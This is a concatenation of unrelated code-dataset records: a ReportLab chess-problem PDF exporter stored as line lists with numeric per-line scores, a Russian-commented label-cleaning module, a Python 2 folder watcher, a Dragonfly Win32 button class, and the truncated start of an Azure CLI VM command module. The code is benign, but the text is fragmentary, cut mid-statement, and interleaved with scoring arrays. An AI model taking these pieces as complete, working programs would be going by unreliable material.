len(words[i]) <= w: retval = [' '.join(cur_line_words)] retval.extend(wrapNice(' '.join(words[i:]), w)) return retval else: # rough wrap slice_size = w - total - 1 cur_line_words.append(words[i][0:slice_size]) retval = [' '.join(cur_line_words)] tail = ' '.join([words[i][slice_size:]] + words[i + 1:]) retval.extend(wrapNice(tail, w)) return retval elif new_total == w: cur_line_words.append(words[i]) retval = [' '.join(cur_line_words)] if i == len(words) - 1: return retval else: retval.extend(wrapNice(' '.join(words[i + 1:]), w)) return retval else: cur_line_words.append(words[i]) total = new_total return [' '.join(cur_line_words)] def removeInlineIdents(line): outer = 0 while outer < len(line) and line[outer] == ' ': outer = outer + 1 return line[0:outer] + \ ' '.join([x for x in line.strip().split(' ') if x != ''])
[ "# -*- coding: utf-8 -*-\n", "\n", "# local\n", "import model\n", "\n", "# 3rd party\n", "import reportlab.rl_config\n", "reportlab.rl_config.warnOnMissingFontGlyphs = 0\n", "from reportlab.pdfbase import pdfmetrics\n", "from reportlab.pdfbase.ttfonts import TTFont\n", "import reportlab.platypus\n", "from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\n", "from reportlab.lib.pagesizes import A4\n", "from PyQt5 import QtGui\n", "\n", "# local\n", "import model\n", "\n", "\n", "FONT_FAMILY = 'Roboto Condensed'\n", "FONT_SIZE = {\n", " 'header': 12,\n", " 'chess': 18,\n", " 'subscript': 10,\n", " 'footer': 10,\n", " 'rightpane': 12}\n", "FONT_DIR = 'resources/fonts/roboto/'\n", "FONT_INFO = {\n", " 'normal': (\n", " FONT_FAMILY + '',\n", " 'RobotoCondensed-Regular.ttf'),\n", " 'bold': (\n", " FONT_FAMILY + ' Bold',\n", " 'RobotoCondensed-Bold.ttf'),\n", " 'italic': (\n", " FONT_FAMILY + ' Italic',\n", " 'RobotoCondensed-Italic.ttf'),\n", " 'boldItalic': (\n", " FONT_FAMILY + ' Bold Italic',\n", " 'RobotoCondensed-BoldItalic.ttf')}\n", "CHESS_FONTS = {\n", " 'd': ('GC2004D', 'resources/fonts/gc2004d_.ttf'),\n", " 'x': ('GC2004X', 'resources/fonts/gc2004x_.ttf'),\n", " 'y': ('GC2004Y', 'resources/fonts/gc2004y_.ttf')\n", "}\n", "CHESS_FONT_RENDERING_OFFSET = 0.25\n", "MARGIN_X, MARGIN_Y = 72 - FONT_SIZE['chess'], 72\n", "AUX_X_MARGIN = 36\n", "\n", "CHESS_FONT_STYLES = {}\n", "\n", "def register_fonts():\n", "\n", " for variation in list(FONT_INFO.keys()):\n", " pdfmetrics.registerFont(TTFont(FONT_INFO[variation][0], FONT_DIR+FONT_INFO[variation][1]))\n", "\n", " pdfmetrics.registerFontFamily(\n", " FONT_FAMILY,\n", " normal=FONT_INFO['normal'][0],\n", " bold=FONT_INFO['bold'][0],\n", " italic=FONT_INFO['italic'][0],\n", " boldItalic=FONT_INFO['boldItalic'][0])\n", "\n", "\n", " for key in list(CHESS_FONTS.keys()):\n", " pdfmetrics.registerFont(TTFont(CHESS_FONTS[key][0], CHESS_FONTS[key][1]))\n", " pdfmetrics.registerFontFamily(key, normal=key, bold=key, italic=key, boldItalic=key)\n", " styles = getSampleStyleSheet()\n", " styles.add(\n", " ParagraphStyle(\n", " name='chess'+key,\n", " wordWrap=False,\n", " fontName=CHESS_FONTS[key][0],\n", " fontSize=FONT_SIZE['chess'],\n", " spaceAfter=0))\n", " CHESS_FONT_STYLES[key] = styles['chess'+key]\n", "\n", "\n", "def getPieceParagraph(font, char):\n", " return reportlab.platypus.Paragraph(\n", " '<para autoLeading=\"max\">%s</para>' % char,\n", " CHESS_FONT_STYLES[font]\n", " )\n", "\n", "\n", "class ExportDocument:\n", "\n", " def __init__(self, records, Lang):\n", " ExportDocument.startFonts()\n", " self.records, self.Lang = records, Lang\n", " register_fonts()\n", " styles = getSampleStyleSheet()\n", " styles.add(ParagraphStyle(name='Justify', wordWrap=True))\n", " styles.add(ParagraphStyle(name='Center', alignment=reportlab.lib.enums.TA_CENTER))\n", " styles.add(\n", " ParagraphStyle(\n", " name='Pre',\n", " wordWrap=True,\n", " fontName=FONT_FAMILY,\n", " fontSize=FONT_SIZE['rightpane'],\n", " spaceAfter=FONT_SIZE['rightpane']))\n", " self.style = styles['Justify']\n", " self.style_pre = styles['Pre']\n", " self.style_center = styles['Center']\n", "\n", " def doExport(self, filename):\n", " frameTemplate = reportlab.platypus.Frame(\n", " 0, 0, A4[0], A4[1],\n", " leftPadding=MARGIN_X, bottomPadding=MARGIN_Y,\n", " rightPadding=MARGIN_X, topPadding=MARGIN_Y\n", " )\n", " pageTemplate = reportlab.platypus.PageTemplate(frames=[frameTemplate])\n", " docTemplate = reportlab.platypus.BaseDocTemplate(\n", " filename,\n", " pagesize=A4,\n", " pageTemplates=[pageTemplate],\n", " showBoundary=1,\n", " leftMargin=0,\n", " rightMargin=0,\n", " topMargin=0,\n", " bottomMargin=0,\n", " allowSplitting=1,\n", " _pageBreakQuick=1)\n", "\n", " story = []\n", " for i in range(0, len(self.records)):\n", " story.append(self.mainTable(self.records[i]))\n", " story.append(reportlab.platypus.PageBreak())\n", "\n", " docTemplate.build(story)\n", "\n", " def subscript(self, left, middle, right):\n", " fs = FONT_SIZE['chess']\n", " t = reportlab.platypus.Table([['', left, middle, right]],\n", " colWidths=[fs*(1+CHESS_FONT_RENDERING_OFFSET), 2 * fs, 4 * fs, 2 * fs],\n", " rowHeights=[None]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('LEFTPADDING', (1, 0), (1, 0), 0),\n", " ('RIGHTPADDING', (3, 0), (3, 0), 0),\n", " ('TOPPADDING', (0, 0), (-1, 0), FONT_SIZE['subscript']),\n", " ('VALIGN', (0, 0), (-1, 0), 'TOP'),\n", " ('ALIGN', (1, 0), (1, 0), 'LEFT'),\n", " ('ALIGN', (2, 0), (2, 0), 'CENTER'),\n", " ('ALIGN', (3, 0), (3, 0), 'RIGHT'),\n", " ('FACE', (0, 0), (-1, 0), FONT_FAMILY),\n", " ('SIZE', (0, 0), (-1, 0), FONT_SIZE['subscript'])\n", " ]))\n", " return t\n", "\n", " def mainTable(self, entry):\n", " w_left = 10 * FONT_SIZE['chess']\n", " w_right = A4[0] - 2 * MARGIN_X - w_left - AUX_X_MARGIN\n", " t = reportlab.platypus.Table(\n", " [[self.leftTop(entry), '', ''],\n", " [self.leftBottom(entry), '', self.rightBottom(entry)]],\n", " colWidths=[w_left, AUX_X_MARGIN, w_right],\n", " rowHeights=[None, None]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('VALIGN', (0, 0), (-1, 0), 'BOTTOM'),\n", " ('VALIGN', (0, 1), (-1, 1), 'TOP')\n", " ]))\n", " return t\n", "\n", " def leftTop(self, e):\n", " if e is None:\n", " return ''\n", " header = reportlab.platypus.Paragraph(\n", " '<font face=\"%s\" size=%d>%s</font><br/>' % (FONT_FAMILY, FONT_SIZE['header'],\n", " ExportDocument.header(e, self.Lang)), self.style\n", " )\n", " return reportlab.platypus.Table(\n", " [['', header]],\n", " colWidths=[FONT_SIZE['chess'], 9*FONT_SIZE['chess']]\n", " )\n", "\n", "\n", " def leftBottom(self, e):\n", " story = []\n", " if e is None:\n", " return story\n", " b = model.Board()\n", " if 'algebraic' in e:\n", " b.fromAlgebraic(e['algebraic'])\n", " story.append(self.getBoardTable(b))\n", " s_left = ''\n", " if 'stipulation' in e:\n", " s_left = e['stipulation']\n", " s_middle = reportlab.platypus.Paragraph(\n", " '<font face=\"%s\" size=%d>%s</font>' %\n", " (FONT_FAMILY,\n", " FONT_SIZE['footer'],\n", " ExportDocument.solver(\n", " e,\n", " self.Lang) +\n", " '<br/>' +\n", " ExportDocument.legend(b)),\n", " self.style_center)\n", " story.append(self.subscript(s_left, s_middle, b.getPiecesCount()))\n", " return story\n", "\n", "\n", " def fenLine(self, b):\n", " t = reportlab.platypus.Table([[b.toFen()]])\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " ('TEXTCOLOR', (0, 0), (-1, -1), (0.75, 0.75, 0.75)),\n", " ('LEFTPADDING', (0, 0), (-1, -1), 0),\n", " ('TOPPADDING', (0, 0), (-1, -1), FONT_SIZE['rightpane']),\n", " ]))\n", " return t\n", "\n", " def rightBottom(self, e):\n", " story = []\n", " if e is None:\n", " return story\n", " parts = []\n", " if 'solution' in e:\n", " story.append(\n", " reportlab.platypus.Preformatted(\n", " wrapParagraph(\n", " e['solution'],\n", " 50),\n", " self.style_pre))\n", " if 'keywords' in e:\n", " parts.append('<i>' + ', '.join(e['keywords']) + '</i>')\n", " if 'comments' in e:\n", " parts.append('<br/>'.join(e['comments']))\n", " story.append(reportlab.platypus.Paragraph(\n", " '<font face=\"%s\" size=%d>%s</font>' % (\n", " FONT_FAMILY,\n", " FONT_SIZE['rightpane'],\n", " '<br/><br/>'.join(parts)\n", " ), self.style\n", " ))\n", " if 'algebraic' in e:\n", " b = model.Board()\n", " b.fromAlgebraic(e['algebraic'])\n", " story.append(self.fenLine(b))\n", " return story\n", "\n", " def header(e, Lang):\n", " parts = []\n", " if'authors' in e:\n", " parts.append(\"<b>\" + \"<br/>\".join(e['authors']) + \"</b>\")\n", " if 'source' in e and 'name' in e['source']:\n", " s = \"<i>\" + e['source']['name'] + \"</i>\"\n", " sourceid = model.formatIssueAndProblemId(e['source'])\n", " if sourceid != '':\n", " s = s + \"<i> (\" + sourceid + \")</i>\"\n", " if 'date' in e['source']:\n", " s = s + \"<i>, \" + model.formatDate(e['source']['date']) + \"</i>\"\n", " parts.append(s)\n", " if 'award' in e:\n", " tourney = e.get('award', {}).get('tourney', {}).get('name', '')\n", " source = e.get('source', {}).get('name', '')\n", " if tourney != '' and tourney != source:\n", " parts.append(tourney)\n", " if 'distinction' in e['award']:\n", " d = model.Distinction.fromString(e['award']['distinction'])\n", " parts.append(d.toStringInLang(Lang))\n", " return ExportDocument.escapeHtml(\"<br/>\".join(parts))\n", " header = staticmethod(header)\n", "\n", " def solver(e, Lang):\n", " parts = []\n", " if(model.notEmpty(e, 'intended-solutions')):\n", " if '.' in e['intended-solutions']:\n", " parts.append(e['intended-solutions'])\n", " else:\n", " parts.append(\n", " e['intended-solutions'] +\n", " \" \" +\n", " Lang.value('EP_Intended_solutions_shortened'))\n", " if('options' in e):\n", " parts.append(\"<b>\" + \"<br/>\".join(e['options']) + \"</b>\")\n", " if('twins' in e):\n", " parts.append(model.createPrettyTwinsText(e))\n", " return ExportDocument.escapeHtml(\"<br/>\".join(parts))\n", " solver = staticmethod(solver)\n", "\n", " def legend(board):\n", " legend = board.getLegend()\n", " if len(legend) == 0:\n", " return ''\n", " return ExportDocument.escapeHtml(\n", " \"<br/>\".join([\", \".join(legend[k]) + ': ' + k for k in list(legend.keys())]))\n", " legend = staticmethod(legend)\n", "\n", " def escapeHtml(str):\n", " str = str.replace('&', '&amp;')\n", " # todo: more replacements\n", " return str\n", " escapeHtml = staticmethod(escapeHtml)\n", "\n", " fontsStarted = False\n", " def startFonts():\n", " if ExportDocument.fontsStarted:\n", " return\n", " register_fonts()\n", " ExportDocument.topBorder = [getPieceParagraph('y', char) for char in \"KLLLLLLLLM\"]\n", " ExportDocument.bottomBorder = [getPieceParagraph('y', char) for char in \"RSSSSSSSST\"]\n", " ExportDocument.leftBorder = getPieceParagraph('y', \"N\")\n", " ExportDocument.rightBorder = getPieceParagraph('y', \"Q\")\n", " ExportDocument.fontsStarted = True\n", " startFonts = staticmethod(startFonts)\n", "\n", " def board2Table(self, board):\n", " rows, row = [ExportDocument.topBorder], None\n", " for i in range(64):\n", " if i % 8 == 0:\n", " row = [ExportDocument.leftBorder]\n", " rows.append(row)\n", " font, char = 'd', [\"\\xA3\", \"\\xA4\"][((i >> 3) + (i % 8)) % 2]\n", " if not board.board[i] is None:\n", " glyph = board.board[i].toFen()\n", " if len(glyph) > 1:\n", " glyph = glyph[1:-1]\n", " font = model.FairyHelper.fontinfo[glyph]['family']\n", " char = model.FairyHelper.to_html(glyph, i, board.board[i].specs)\n", " row.append(getPieceParagraph(font, char))\n", " if i % 8 == 7:\n", " row.append(ExportDocument.rightBorder)\n", "\n", " rows.append(ExportDocument.bottomBorder)\n", " return rows\n", "\n", " def board2Html(self, board):\n", " lines = []\n", " spans, fonts, prevfont = [], [], 'z'\n", " for i in range(64):\n", " font, char = 'd', [\"\\xA3\", \"\\xA4\"][((i >> 3) + (i % 8)) % 2]\n", " if not board.board[i] is None:\n", " glyph = board.board[i].toFen()\n", " if len(glyph) > 1:\n", " glyph = glyph[1:-1]\n", " font = model.FairyHelper.fontinfo[glyph]['family']\n", " char = model.FairyHelper.fontinfo[glyph][\n", " 'chars'][((i >> 3) + (i % 8)) % 2]\n", " if font != prevfont:\n", " fonts.append(font)\n", " spans.append([char])\n", " prevfont = font\n", " else:\n", " spans[-1].append(char)\n", " if i != 63 and i % 8 == 7:\n", " spans[-1].append(\"<br/>\")\n", " return ''.join(\n", " [\n", " '<font face=\"%s\" size=%d>%s</font>' %\n", " (CHESS_FONTS[\n", " fonts[i]][0],\n", " FONT_SIZE['chess'],\n", " ''.join(\n", " spans[i])) for i in range(\n", " len(fonts))])\n", "\n", " def getBoardTable(self, b):\n", " t = reportlab.platypus.Table(\n", " self.board2Table(b),\n", " colWidths = [FONT_SIZE['chess'] for _ in range(10)],\n", " rowHeights = [FONT_SIZE['chess'] for _ in range(10)]\n", " )\n", " t.setStyle(reportlab.platypus.TableStyle([\n", " #('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),\n", " #('BOX', (0,0), (-1,-1), 0.25, colors.black),\n", " ]))\n", " return t\n", "\n", "\n", "def wrapParagraph(str, w):\n", " lines = []\n", " for line in str.split(\"\\n\"):\n", " lines.extend(wrapNice(removeInlineIdents(line), w))\n", " return \"\\n\".join(lines)\n", "\n", "\n", "def wrapNice(line, w):\n", " if len(line) < w:\n", " return [line]\n", " words = line.split(' ')\n", " cur_line_words = []\n", " total = 0\n", " for i in range(len(words)):\n", " if total == 0:\n", " new_total = len(words[i])\n", " else:\n", " new_total = total + 1 + len(words[i])\n", " if new_total > w:\n", " if len(words[i]) <= w:\n", " retval = [' '.join(cur_line_words)]\n", " retval.extend(wrapNice(' '.join(words[i:]), w))\n", " return retval\n", " else: # rough wrap\n", " slice_size = w - total - 1\n", " cur_line_words.append(words[i][0:slice_size])\n", " retval = [' '.join(cur_line_words)]\n", " tail = ' '.join([words[i][slice_size:]] + words[i + 1:])\n", " retval.extend(wrapNice(tail, w))\n", " return retval\n", " elif new_total == w:\n", " cur_line_words.append(words[i])\n", " retval = [' '.join(cur_line_words)]\n", " if i == len(words) - 1:\n", " return retval\n", " else:\n", " retval.extend(wrapNice(' '.join(words[i + 1:]), w))\n", " return retval\n", " else:\n", " cur_line_words.append(words[i])\n", " total = new_total\n", " return [' '.join(cur_line_words)]\n", "\n", "\n", "def removeInlineIdents(line):\n", " outer = 0\n", " while outer < len(line) and line[outer] == ' ':\n", " outer = outer + 1\n", " return line[0:outer] + \\\n", " ' '.join([x for x in line.strip().split(' ') if x != ''])\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.022222222222222223, 0.038461538461538464, 0.014492753623188406, 0.02564102564102564, 0.041666666666666664, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0.012195121951219513, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0.016129032258064516, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0.01098901098901099, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0.03076923076923077, 0.03076923076923077, 0, 0, 0.015625, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
420
0.001661
false
#-*- coding: utf-8 -*- """ file : import LabelPurgers abs. : пакет содержит функции обработки излов графа Набор функция очистки узла """ def purge_node(label_name): """ Очистка меток Precond.: все комментакии удалены """ result = label_name result = result.replace(':', '') result = result.replace(' ', '') result = result.replace('\t', '') return result def purge_jamps_label(s): """ Очистка вспомогательных меток !! нужно уметь определать закомменценные """ # форматирование label = s.split() label[1] = label[1].replace('\t', '') label[1] = label[1].replace(':', '') sumLabel = label[1].split(';') return sumLabel[0] """ берет комманду """ def purge_bypass_and_return_labels(node): # форматирование splitList = node.split(';') label = splitList[0].split() sumLabel = label[0].split() return sumLabel[0] """ Пока берем только код операции """ def purgeLine(line): resSplitting = line.split() if len(resSplitting) > 0: return resSplitting[0] else: return ""
[ "#-*- coding: utf-8 -*-\n", "\"\"\" \n", " file : import LabelPurgers\n", "\n", " abs. : пакет содержит функции обработки излов графа\n", " Набор функция очистки узла\n", "\"\"\"\n", "\n", "def purge_node(label_name):\n", " \"\"\" Очистка меток \n", " Precond.: все комментакии удалены\n", " \"\"\"\n", " result = label_name\n", " result = result.replace(':', '')\n", " result = result.replace(' ', '')\n", " result = result.replace('\\t', '')\n", " return result\n", "\n", "def purge_jamps_label(s):\n", " \"\"\" Очистка вспомогательных меток \n", " !! нужно уметь определать закомменценные\n", " \"\"\"\n", " # форматирование\n", " label = s.split()\n", " label[1] = label[1].replace('\\t', '')\n", " label[1] = label[1].replace(':', '')\n", " sumLabel = label[1].split(';')\n", " return sumLabel[0]\n", "\n", "\"\"\" берет комманду \"\"\"\n", "def purge_bypass_and_return_labels(node):\n", " # форматирование\n", " splitList = node.split(';')\n", " label = splitList[0].split()\n", " sumLabel = label[0].split()\n", " return sumLabel[0]\n", " \n", "\"\"\" Пока берем только код операции \"\"\"\n", "def purgeLine(line):\n", " resSplitting = line.split()\n", " if len(resSplitting) > 0:\n", " return resSplitting[0]\n", " else:\n", " return \"\"" ]
[ 0.043478260869565216, 0.2, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0.038461538461538464, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0.023809523809523808, 0, 0, 0, 0, 0, 0.2, 0.02564102564102564, 0.047619047619047616, 0, 0, 0, 0, 0.058823529411764705 ]
44
0.017867
false
#!/usr/bin/python import os import script import sys import time import thread import threading job_queue = [] # List of tuples (FILEPATH, EVENT) previous_state = {} # Dictionary: key -> folderpath # value -> list of files LOCK = threading.RLock(); def background_runner(): global job_queue while True: num_of_jobs = 0 LOCK.acquire() if len(job_queue) > 0: job_tuple = job_queue.pop(0) num_of_jobs = len(job_tuple) script.update_database(job_tuple[0], job_tuple[1]) LOCK.release() if num_of_jobs == 0: time.sleep(2) else: time.sleep(1.0/(num_of_jobs * 2)) def main(): global previous_state global job_queue if len(sys.argv) != 2: print "Please enter the path to the directory to watch as an argument." exit() folder_path = sys.argv[1] thread.start_new_thread(background_runner, ()) while True: state = {} jobs_to_add = [] for root, subdirs, files in os.walk(folder_path): state[root] = files if not previous_state == state: if not previous_state == {}: # insertions for key in state: if not state.get(key) == previous_state.get(key): prev_value = previous_state.get(key) if prev_value is None: for value in state[key]: jobs_to_add.append((key + "/" + value, "new")) else: for value in state[key]: if value not in prev_value: jobs_to_add.append((key + "/" + value, "new")) # deletions for key in previous_state: if not previous_state.get(key) == state.get(key): cur_value = state.get(key) if cur_value is None: for value in previous_state[key]: jobs_to_add.append((key + "/" + value, "delete")) else: for value in previous_state[key]: if value not in cur_value: jobs_to_add.append((key + "/" + value, "delete")) previous_state = state if len(jobs_to_add) > 0: LOCK.acquire() for job in jobs_to_add: job_queue.append(job) LOCK.release() time.sleep(2) if __name__ == "__main__": main()
[ "#!/usr/bin/python\n", "\n", "import os\n", "import script\n", "import sys\n", "import time\n", "import thread\n", "import threading\n", "\n", "\n", "job_queue = [] # List of tuples (FILEPATH, EVENT)\n", "previous_state = {} # Dictionary: key -> folderpath\n", " # value -> list of files\n", "LOCK = threading.RLock();\n", "\n", "\n", "def background_runner():\n", " global job_queue\n", "\n", " while True:\n", " num_of_jobs = 0\n", "\n", " LOCK.acquire() \n", " if len(job_queue) > 0:\n", " job_tuple = job_queue.pop(0)\n", " num_of_jobs = len(job_tuple)\n", " script.update_database(job_tuple[0], job_tuple[1])\n", " LOCK.release()\n", " if num_of_jobs == 0:\n", " time.sleep(2)\n", " else:\n", " time.sleep(1.0/(num_of_jobs * 2))\n", "\n", "\n", "\n", "def main():\n", " global previous_state\n", " global job_queue\n", "\n", " if len(sys.argv) != 2:\n", " print \"Please enter the path to the directory to watch as an argument.\"\n", " exit()\n", " \n", " folder_path = sys.argv[1]\n", "\n", " thread.start_new_thread(background_runner, ())\n", "\n", " while True:\n", " state = {}\n", " jobs_to_add = []\n", "\n", " for root, subdirs, files in os.walk(folder_path):\n", " state[root] = files\n", "\n", " if not previous_state == state:\n", " if not previous_state == {}:\n", "\n", " # insertions\n", " for key in state:\n", " if not state.get(key) == previous_state.get(key):\n", " prev_value = previous_state.get(key)\n", " if prev_value is None:\n", " for value in state[key]:\n", " jobs_to_add.append((key + \"/\" + value, \"new\"))\n", " else:\n", " for value in state[key]:\n", " if value not in prev_value:\n", " jobs_to_add.append((key + \"/\" + value, \"new\"))\n", "\n", "\n", " # deletions\n", " for key in previous_state:\n", " if not previous_state.get(key) == state.get(key):\n", " cur_value = state.get(key)\n", " if cur_value is None:\n", " for value in previous_state[key]:\n", " jobs_to_add.append((key + \"/\" + value, \"delete\"))\n", " else:\n", " for value in previous_state[key]:\n", " if value not in cur_value:\n", " jobs_to_add.append((key + \"/\" + value, \"delete\"))\n", "\n", "\n", " previous_state = state\n", "\n", "\n", " if len(jobs_to_add) > 0:\n", " LOCK.acquire()\n", " for job in jobs_to_add:\n", " job_queue.append(job)\n", " LOCK.release()\n", "\n", " time.sleep(2)\n", "\n", "\n", "if __name__ == \"__main__\":\n", " main()" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0.019230769230769232, 0.017543859649122806, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0.011627906976744186, 0, 0, 0.02857142857142857, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1 ]
97
0.006708
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ This file implements a standard Win32 button control. """ #--------------------------------------------------------------------------- import win32con from dragonfly.windows.control_base import ControlBase #--------------------------------------------------------------------------- class Button(ControlBase): def __init__(self, parent, text, size, default=False, **kwargs): flavor = 128 style = ( win32con.BS_PUSHBUTTON | win32con.BS_TEXT | win32con.WS_CHILD | win32con.WS_TABSTOP | win32con.WS_OVERLAPPED | win32con.WS_VISIBLE) if default: style |= win32con.BS_DEFPUSHBUTTON else: style |= win32con.BS_PUSHBUTTON ControlBase.__init__(self, parent, flavor, text, size, style, **kwargs)
[ "#\r\n", "# This file is part of Dragonfly.\r\n", "# (c) Copyright 2007, 2008 by Christo Butcher\r\n", "# Licensed under the LGPL.\r\n", "#\r\n", "# Dragonfly is free software: you can redistribute it and/or modify it \r\n", "# under the terms of the GNU Lesser General Public License as published \r\n", "# by the Free Software Foundation, either version 3 of the License, or \r\n", "# (at your option) any later version.\r\n", "#\r\n", "# Dragonfly is distributed in the hope that it will be useful, but \r\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU \r\n", "# Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with Dragonfly. If not, see \r\n", "# <http://www.gnu.org/licenses/>.\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", "This file implements a standard Win32 button control.\r\n", "\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "import win32con\r\n", "\r\n", "from dragonfly.windows.control_base import ControlBase\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "class Button(ControlBase):\r\n", "\r\n", " def __init__(self, parent, text, size, default=False, **kwargs):\r\n", " flavor = 128\r\n", " style = ( win32con.BS_PUSHBUTTON\r\n", " | win32con.BS_TEXT\r\n", " | win32con.WS_CHILD\r\n", " | win32con.WS_TABSTOP\r\n", " | win32con.WS_OVERLAPPED\r\n", " | win32con.WS_VISIBLE)\r\n", " if default: style |= win32con.BS_DEFPUSHBUTTON\r\n", " else: style |= win32con.BS_PUSHBUTTON\r\n", " ControlBase.__init__(self, parent, flavor, text, size, style,\r\n", " **kwargs)\r\n" ]
[ 0, 0, 0, 0, 0, 0.013333333333333334, 0.013157894736842105, 0.013333333333333334, 0, 0, 0.014084507042253521, 0.015384615384615385, 0.013888888888888888, 0, 0, 0.014084507042253521, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0.046511627906976744, 0.02702702702702703, 0.02631578947368421, 0.025, 0.023255813953488372, 0.024390243902439025, 0.017543859649122806, 0.018518518518518517, 0, 0 ]
49
0.007181
false
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from collections import OrderedDict from azure.cli.command_modules.vm._client_factory import (cf_vm, cf_avail_set, cf_ni, cf_vm_ext, cf_vm_ext_image, cf_vm_image, cf_usage, cf_vmss, cf_vmss_vm, cf_vm_sizes, cf_disks, cf_snapshots, cf_images, cf_run_commands) from azure.cli.core.commands import DeploymentOutputLongRunningOperation, cli_command from azure.cli.core.commands.arm import \ (cli_generic_update_command, cli_generic_wait_command, handle_long_running_operation_exception, deployment_validate_table_format) from azure.cli.core.util import empty_on_404 from azure.cli.core.profiles import supported_api_version, ResourceType # pylint: disable=line-too-long custom_path = 'azure.cli.command_modules.vm.custom#{}' mgmt_path = 'azure.mgmt.compute.compute.operations.{}#{}.{}' # VM def transform_ip_addresses(result): transformed = [] for r in result: network = r['virtualMachine']['network'] public = network.get('publicIpAddresses') public_ip_addresses = ','.join([p['ipAddress'] for p in public if p['ipAddress']]) if public else None private = network.get('privateIpAddresses') private_ip_addresses = ','.join(private) if private else None entry = OrderedDict([('virtualMachine', r['virtualMachine']['name']), ('publicIPAddresses', public_ip_addresses), ('privateIPAddresses', private_ip_addresses)]) transformed.append(entry) return transformed def transform_vm(result): return OrderedDict([('name', result['name']), ('resourceGroup', result['resourceGroup']), ('powerState', result.get('powerState')), ('publicIps', result.get('publicIps')), ('fqdns', result.get('fqdns')), ('location', result['location'])]) def transform_vm_create_output(result): from azure.cli.core.commands.arm import 